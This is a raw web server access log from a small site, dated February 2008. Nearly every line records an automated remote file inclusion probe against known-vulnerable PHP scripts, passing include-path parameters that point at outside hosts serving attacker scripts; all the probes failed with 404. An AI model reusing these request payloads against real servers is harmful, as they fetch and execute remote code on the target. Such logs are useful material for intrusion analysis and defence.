75.0.141.110 - - [10/Feb/2008:16:00:27 -0800] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:16:00:31 -0800] "GET /logs/access_080127.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.93.164.74 - - [10/Feb/2008:16:00:54 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:16:01:12 -0800] "GET /logs/access_080121.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:16:01:13 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:16:01:15 -0800] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.28.103 - - [10/Feb/2008:16:02:44 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.immo.plocknet.eu/me.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
69.46.28.103 - - [10/Feb/2008:16:02:45 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.immo.plocknet.eu/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
69.93.164.74 - - [10/Feb/2008:16:02:46 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.164.74 - - [10/Feb/2008:16:02:46 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.164.74 - - [10/Feb/2008:16:02:46 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.164.74 - - [10/Feb/2008:16:02:57 -0800] "GET /logs/access_080127.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:16:03:07 -0800] "GET /logs/access_071126.log//include.php?path[docroot]=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:16:03:07 -0800] "GET /logs//include.php?path[docroot]=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.55.166.250 - - [10/Feb/2008:16:03:25 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.55.166.250 - - [10/Feb/2008:16:03:25 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.55.166.250 - - [10/Feb/2008:16:03:26 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:16:03:26 -0800] "GET /logs/access_071119.log//include.php?path[docroot]=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.55.166.250 - - [10/Feb/2008:16:03:41 -0800] "GET /logs/access_080127.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:16:05:22 -0800] "GET /logs/access_080121.log//init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:16:05:23 -0800] "GET //init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:16:05:25 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
203.105.87.124 - - [10/Feb/2008:16:06:01 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.ar-vision.com/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
81.2.252.56 - - [10/Feb/2008:16:09:06 -0800] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:16:10:28 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:16:10:28 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:16:10:28 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:16:11:52 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:16:11:52 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:16:11:52 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:11 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:11 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:11 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:13 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:13 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:13 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:16 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:16 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:12:16 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.219.124.1 - - [10/Feb/2008:16:12:19 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
81.219.124.1 - - [10/Feb/2008:16:12:19 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:16:12:50 -0800] "GET /logs/access_080127.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:16:12:51 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:16:12:51 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.36.230.172 - - [10/Feb/2008:16:12:52 -0800] "GET /logs/access.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.36.230.172 - - [10/Feb/2008:16:12:57 -0800] "GET /logs/access_080114.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:13:19 -0800] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:13:24 -0800] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.0.130 - - [10/Feb/2008:16:13:24 -0800] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
124.217.247.166 - - [10/Feb/2008:16:13:48 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [10/Feb/2008:16:13:49 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [10/Feb/2008:16:13:50 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:16:13:52 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:16:14:45 -0800] "GET /logs/access_071126.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:16:14:45 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:16:14:46 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:16:14:46 -0800] "GET /logs/access_071126.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:16:14:46 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:16:14:46 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
63.87.231.149 - - [10/Feb/2008:16:15:01 -0800] "GET /logs/access_071217.log//samplefaqsupport.php?path[docroot]=http://www.geocities.com/b1u5crew/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
63.87.231.149 - - [10/Feb/2008:16:15:01 -0800] "GET //samplefaqsupport.php?path[docroot]=http://www.geocities.com/b1u5crew/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
63.87.231.149 - - [10/Feb/2008:16:15:01 -0800] "GET /logs//samplefaqsupport.php?path[docroot]=http://www.geocities.com/b1u5crew/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:16:15:03 -0800] "GET /logs/access_071210.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:16:15:03 -0800] "GET /logs/access_071210.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:16:15:32 -0800] "GET /logs/access_071203.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
217.36.230.172 - - [10/Feb/2008:16:16:48 -0800] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.36.230.172 - - [10/Feb/2008:16:16:53 -0800] "GET /logs/access_080114.log//init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.48.10.14 - - [10/Feb/2008:16:18:45 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
124.217.247.166 - - [10/Feb/2008:16:18:49 -0800] "GET /logs/access_071203.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
203.105.87.124 - - [10/Feb/2008:16:20:22 -0800] "GET /logs/access_080107.log//components/com_forum/download.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
203.105.87.124 - - [10/Feb/2008:16:20:23 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
203.105.87.124 - - [10/Feb/2008:16:20:49 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.ar-vision.com/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
203.105.87.124 - - [10/Feb/2008:16:20:49 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.ar-vision.com/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
75.0.141.110 - - [10/Feb/2008:16:20:57 -0800] "GET /logs/access_071210.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:16:21:15 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:16:21:15 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:16:21:15 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:16:21:15 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:16:21:15 -0800] "GET /logs/%3Cwbr%20//phpSecurePages/secure.php?&cfgProgDir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:16:21:16 -0800] "GET /logs/%3Cwbr%20//phpSecurePages/secure.php?&cfgProgDir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
80.237.131.20 - - [10/Feb/2008:16:21:55 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:16:21:56 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//phpSecurePages/secure.php?&cfgProgDir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
203.105.87.124 - - [10/Feb/2008:16:21:58 -0800] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.ar-vision.com/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:16:22:04 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//phpSecurePages/secure.php?&cfgProgDir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
86.217.33.108 - - [10/Feb/2008:16:23:10 -0800] "GET /logs/access.log HTTP/1.0" 200 19342 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.toulouseangloexchange.com"
80.237.131.20 - - [10/Feb/2008:16:24:34 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.237.131.20 - - [10/Feb/2008:16:24:35 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.237.131.20 - - [10/Feb/2008:16:24:35 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.212.164.34 - - [10/Feb/2008:16:25:06 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.237.131.20 - - [10/Feb/2008:16:25:16 -0800] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
75.0.141.110 - - [10/Feb/2008:16:25:39 -0800] "GET /logs/access_071022.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:16:27:38 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
75.0.141.110 - - [10/Feb/2008:16:27:55 -0800] "GET /logs/access_080114.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
83.149.90.29 - - [10/Feb/2008:16:28:16 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.freewebtown.com/shadowas/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
83.149.90.29 - - [10/Feb/2008:16:28:16 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.freewebtown.com/shadowas/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
66.212.28.43 - - [10/Feb/2008:16:28:20 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
66.212.28.43 - - [10/Feb/2008:16:28:20 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
77.48.10.14 - - [10/Feb/2008:16:28:30 -0800] "GET /logs/access_071231.log/tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.48.10.14 - - [10/Feb/2008:16:28:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
207.157.58.25 - - [10/Feb/2008:16:31:30 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
207.157.58.25 - - [10/Feb/2008:16:31:35 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
208.53.147.60 - - [10/Feb/2008:16:31:54 -0800] "GET /logs//errors.php?error=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
208.53.147.60 - - [10/Feb/2008:16:31:54 -0800] "GET //errors.php?error=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
77.48.10.14 - - [10/Feb/2008:16:31:54 -0800] "GET /logs/access_071105.log/tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:16:32:19 -0800] "GET /logs/access_080127.log//modules/xfsection/modify.php?dir_module=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:16:32:19 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:16:32:19 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.45.242.50 - - [10/Feb/2008:16:32:37 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
66.45.242.50 - - [10/Feb/2008:16:32:38 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
221.143.49.246 - - [10/Feb/2008:16:32:39 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
